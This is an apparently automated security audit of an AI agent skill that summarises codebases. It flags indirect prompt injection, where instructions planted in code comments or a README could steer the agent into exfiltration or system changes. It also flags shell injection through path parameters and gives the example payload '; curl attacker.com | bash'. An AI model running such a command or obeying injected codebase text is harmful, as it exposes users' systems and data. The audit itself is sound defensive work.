codebase-summary
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGHCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- Indirect Prompt Injection (HIGH): The skill is highly vulnerable to Indirect Prompt Injection (Category 8). It is designed to ingest the entire content of an untrusted codebase to produce an 'AI-optimized knowledge base' (index.md).
- Ingestion points: Every file within the directory specified by
codebase_pathis analyzed by the scripts and potentially summarized. - Boundary markers: Absent. There are no delimiters or 'ignore instructions' warnings provided to the agent to distinguish between documentation and malicious instructions embedded in the analyzed code.
- Capability inventory: The skill allows for shell execution (via local scripts), file modification (writing documentation), and 'consolidation' of summaries into root files like
README.md. - Sanitization: Absent. Content is extracted and formatted into documentation that the agent is explicitly instructed to use as its 'primary context'.
- Risk: An attacker could place malicious instructions inside a codebase file (e.g., inside a comment or a README) that, when summarized, instructs the AI agent to perform unauthorized actions like exfiltrating data or modifying the system.
- Command Execution (HIGH): The skill workflow in
SKILL.mdconstructs shell commands using string interpolation of user-provided parameters (codebase_path,output_dir). - Evidence:
python {baseDir}/scripts/analyze_structure.py "{codebase_path}" --depth 4 --output "{output_dir}/codebase_info.md". - Risk: If these parameters are not strictly validated or escaped by the agent, a malicious path containing shell metacharacters (e.g.,
; curl attacker.com | bash) could lead to arbitrary command execution on the host system. - Privilege Escalation (MEDIUM): The
consolidatefeature (Category 5) allows the agent to write data to the root of the codebase. If theconsolidate_targetparameter is manipulated, or if the agent is directed to a sensitive directory viacodebase_path, it could be used to overwrite critical system configuration files or startup scripts.
Recommendations
- AI detected serious security threats
Audit Metadata